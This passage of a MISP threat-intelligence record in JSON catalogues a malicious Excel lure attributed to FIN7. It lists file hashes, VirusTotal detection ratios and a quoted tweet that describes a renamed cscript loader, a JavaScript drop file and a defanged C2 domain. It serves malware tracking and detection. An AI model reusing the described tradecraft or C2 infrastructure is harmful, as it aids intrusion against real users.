			`"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",`
			`"template_version": "17",`
			`"timestamp": "1557819654",`
			`"uuid": "5cda6f37-4d7c-4ad4-9000-6ec3950d210f",`
			`"Attribute": [`
			`{`
			`"category": "Payload delivery",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": true,`
			`"object_relation": "filename",`
			`"timestamp": "1557819654",`
			`"to_ids": true,`
			`"type": "filename",`
			`"uuid": "5cda6f37-eb5c-4ade-b804-6ec3950d210f",`
			`"value": "Bank Statement James Fifeman.xls"`
			`},`
			`{`
			`"category": "Other",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": true,`
			`"object_relation": "state",`
			`"timestamp": "1557819654",`
			`"to_ids": false,`
			`"type": "text",`
			`"uuid": "5cda6f37-4910-45f7-ae79-6ec3950d210f",`
			`"value": "Malicious"`
			`},`
			`{`
			`"category": "Payload delivery",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "sha256",`
			`"timestamp": "1557819654",`
			`"to_ids": true,`
			`"type": "sha256",`
			`"uuid": "5cda7106-f620-4d93-ae5a-90d9950d210f",`
			`"value": "1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1"`
			`}`
			`]`
			`},`
			`{`
			`"comment": "",`
			`"deleted": false,`
			`"description": "File object describing a file with meta-information",`
			`"meta-category": "file",`
			`"name": "file",`
			`"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",`
			`"template_version": "15",`
			`"timestamp": "1563528120",`
			`"uuid": "8d2ae1f9-3b21-43e4-aceb-121f903988bc",`
			`"ObjectReference": [`
			`{`
			`"comment": "",`
			`"object_uuid": "8d2ae1f9-3b21-43e4-aceb-121f903988bc",`
			`"referenced_uuid": "72369506-7485-494e-b492-2a31c412cf70",`
chg: [feed] added 2023-04-21 13:25:09 +00:00			`"relationship_type": "analysed-with",`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"timestamp": "1557822889",`
			`"uuid": "5cda7da9-0520-426f-bf88-4067950d210f"`
			`},`
			`{`
			`"comment": "",`
			`"object_uuid": "8d2ae1f9-3b21-43e4-aceb-121f903988bc",`
			`"referenced_uuid": "7fc62f80-7bf1-48af-96f6-2c3c99a4536c",`
chg: [feed] added 2023-04-21 13:25:09 +00:00			`"relationship_type": "analysed-with",`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"timestamp": "1563528121",`
			`"uuid": "5d318bb9-ae80-4282-9aa5-4acf02de0b81"`
			`}`
			`],`
			`"Attribute": [`
			`{`
			`"category": "Payload delivery",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "md5",`
			`"timestamp": "1557819654",`
			`"to_ids": true,`
			`"type": "md5",`
			`"uuid": "babbec72-3926-4d8d-8931-a9e3f9965c71",`
			`"value": "b136fed01acf1b7e7e43dfa2db292623"`
			`},`
			`{`
			`"category": "Payload delivery",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "sha1",`
			`"timestamp": "1557819654",`
			`"to_ids": true,`
			`"type": "sha1",`
			`"uuid": "be4cdb98-9ba6-4943-9845-08f7b1ef677a",`
			`"value": "d8206bc4bc2efc4062b0f173e8841508c95ed0e4"`
			`},`
			`{`
			`"category": "Payload delivery",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "sha256",`
			`"timestamp": "1557819654",`
			`"to_ids": true,`
			`"type": "sha256",`
			`"uuid": "01abe297-6d6a-442f-9a70-b484f8861e53",`
			`"value": "1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1"`
			`}`
			`]`
			`},`
			`{`
			`"comment": "",`
			`"deleted": false,`
			`"description": "VirusTotal report",`
			`"meta-category": "misc",`
			`"name": "virustotal-report",`
			`"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",`
			`"template_version": "2",`
			`"timestamp": "1557822889",`
			`"uuid": "72369506-7485-494e-b492-2a31c412cf70",`
			`"Attribute": [`
			`{`
			`"category": "Other",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "last-submission",`
			`"timestamp": "1557819654",`
			`"to_ids": false,`
			`"type": "datetime",`
			`"uuid": "4ff03189-7f70-4120-9dbf-48339e5c57d0",`
			`"value": "2019-05-14T04:00:38"`
			`},`
			`{`
			`"category": "Payload delivery",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "permalink",`
			`"timestamp": "1557819654",`
			`"to_ids": false,`
			`"type": "link",`
			`"uuid": "521c12c0-2269-4961-8bad-1482e01ee72b",`
			`"value": "https://www.virustotal.com/file/1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1/analysis/1557806438/"`
			`},`
			`{`
			`"category": "Payload delivery",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": true,`
			`"object_relation": "detection-ratio",`
			`"timestamp": "1557819654",`
			`"to_ids": false,`
			`"type": "text",`
			`"uuid": "c267d1a4-d836-4758-91e2-877f5854faf6",`
			`"value": "11/60"`
			`}`
			`]`
			`},`
			`{`
			`"comment": "",`
			`"deleted": false,`
			`"description": "Microblog post like a Twitter tweet or a post on a Facebook wall.",`
			`"meta-category": "misc",`
			`"name": "microblog",`
			`"template_uuid": "8ec8c911-ddbe-4f5b-895b-fbff70c42a60",`
			`"template_version": "5",`
			`"timestamp": "1557835644",`
			`"uuid": "5cdaaf7c-422c-4524-856c-464b950d210f",`
			`"Attribute": [`
			`{`
			`"category": "Other",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "post",`
			`"timestamp": "1557835645",`
			`"to_ids": false,`
			`"type": "text",`
			`"uuid": "5cdaaf7d-cca4-49d5-bf6c-4e64950d210f",`
			`"value": "@VK_Intel\r\n Moar #FIN7 (link: https://www.virustotal.com/#/file/1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1/detection) virustotal.com/#/file/1fe27e0\u00e2\u20ac\u00a6\r\nCscript renamed to mswmex57.exe and run from Contacts directory. JavaScript from UserForm1 placed in querlog.txt just like old times. New C2 though: hxxps://msdn-update[.]com/"`
			`},`
			`{`
			`"category": "Other",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": true,`
			`"object_relation": "type",`
			`"timestamp": "1557835645",`
			`"to_ids": false,`
			`"type": "text",`
			`"uuid": "5cdaaf7d-89bc-4f82-9c5f-4295950d210f",`
			`"value": "Twitter"`
			`},`
			`{`
			`"category": "Network activity",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "url",`
			`"timestamp": "1557835645",`
			`"to_ids": true,`
			`"type": "url",`
			`"uuid": "5cdaaf7d-5bc8-4555-bfdf-4dc4950d210f",`
			`"value": "https://twitter.com/malz_intel/status/1128058016471719936"`
			`},`
			`{`
			`"category": "Other",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "username-quoted",`
			`"timestamp": "1557835645",`
			`"to_ids": false,`
			`"type": "text",`
			`"uuid": "5cdaaf7d-d750-4d9d-a9a6-4b4b950d210f",`
			`"value": "@VK_Intel"`
			`},`
			`{`
			`"category": "Other",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "creation-date",`
			`"timestamp": "1557835645",`
			`"to_ids": false,`
			`"type": "datetime",`
			`"uuid": "5cdaaf7d-9734-4341-ae0f-4d72950d210f",`
			`"value": "2019-05-14T00:02:00"`
			`},`
			`{`
			`"category": "Other",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "username",`
			`"timestamp": "1557835645",`
			`"to_ids": false,`
			`"type": "text",`
			`"uuid": "5cdaaf7d-bb48-4f3f-80bb-48a2950d210f",`
			`"value": "malz_intel"`
			`}`
			`]`
			`},`
			`{`
			`"comment": "",`
			`"deleted": false,`
			`"description": "VirusTotal report",`
			`"meta-category": "misc",`
			`"name": "virustotal-report",`
			`"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",`
			`"template_version": "2",`
			`"timestamp": "1563528121",`
			`"uuid": "7fc62f80-7bf1-48af-96f6-2c3c99a4536c",`
			`"Attribute": [`
			`{`
			`"category": "Other",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "last-submission",`
			`"timestamp": "1557819654",`
			`"to_ids": false,`
			`"type": "datetime",`
			`"uuid": "c1bf4318-12d5-451a-a094-3ecf4f476b2a",`
			`"value": "2019-06-12T04:39:43"`
			`},`
			`{`
			`"category": "Payload delivery",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "permalink",`
			`"timestamp": "1557819654",`
			`"to_ids": false,`
			`"type": "link",`
			`"uuid": "4b41b608-5721-4f9a-8950-7775eefaebce",`
			`"value": "https://www.virustotal.com/file/1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1/analysis/1560314383/"`
			`},`
			`{`
			`"category": "Payload delivery",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": true,`
			`"object_relation": "detection-ratio",`
			`"timestamp": "1557819654",`
			`"to_ids": false,`
			`"type": "text",`
			`"uuid": "de92bfbb-35cc-4731-8327-4be37aa1cbee",`
			`"value": "30/59"`
			`}`
			`]`
			`}`
chg: [feed] added 2023-04-21 13:25:09 +00:00			`]`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`}`
chg: [feed] added 2023-04-21 13:25:09 +00:00			`}`